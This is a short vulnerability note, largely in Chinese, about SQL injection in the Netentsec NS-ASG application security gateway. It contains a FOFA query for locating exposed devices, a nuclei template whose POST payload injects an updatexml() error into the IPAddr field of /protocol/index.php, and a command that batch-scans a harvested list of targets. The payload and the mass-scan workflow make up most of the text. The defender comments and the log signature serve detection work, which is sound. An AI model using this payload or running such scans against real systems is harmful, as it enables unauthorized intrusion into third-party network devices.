fofa语句:
app="网康科技-NS-ASG安全网关"
nuclei脚本:
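# Detection template for the SQL injection in /protocol/index.php of the
# Netentsec NS-ASG Application Security Gateway (version 6.3 according to the
# description below). It sends one POST request whose IPAddr field makes the
# database compute md5() of a fixed number inside an updatexml() error, and
# reports a finding when that hash fragment is echoed back in the response.
#
# For defenders: requests to /protocol/index.php whose jsoncontent carries
# "updatexml(" in IPAddr are the log signature of this probe. The page names
# no fixed version; check the vendor advisory and keep the management
# interface unreachable from untrusted networks.
id: wangkang-NS-ASG-index-sqli

info:
  name: 网康NS-ASG应用安全网关index.php sql注入漏洞
  author: fgz
  severity: critical
  description: Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。
  metadata:
    max-request: 1
    fofa-query: app="网康科技-NS-ASG安全网关"
    verified: true

requests:
  - raw:
      # Raw HTTP request. The empty line between the headers and the body is
      # required by HTTP; without it the body is read as one more header line.
      # NOTE(review): the PHPSESSID value is fixed, apparently copied from a
      # captured session; whether the endpoint checks it cannot be told from
      # here.
      # NOTE(review): Content-Length is hard-coded from the capture; confirm
      # it matches the body length.
      - |+
        POST /protocol/index.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Sec-Fetch-Dest: empty
        Sec-Fetch-Mode: cors
        Sec-Fetch-Site: same-origin
        Te: trailers
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 263

        jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

    matchers:
      # All three conditions must hold: HTTP 200, the word "error" in the
      # body, and the 31-character hex string, which is presumably the part of
      # md5(102103122) that fits into the database error message (confirm).
      - type: dsl
        dsl:
          - "status_code == 200 && contains((body), 'error') && contains(body,'6cfe798ba8e5b85feb50164c59f4bec')"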
批量验证:
REM Runs the template given to -t against the targets listed in the file given to -l.
REM -p routes the scan traffic through the proxy at 127.0.0.1:8080; -stats prints scan statistics.
nuclei.exe -p http://127.0.0.1:8080 -stats -t wangkang-NS-ASG-index-sqli.yaml -l "F:\mybox\ScanTools\Fofa\final_wangkang.txt"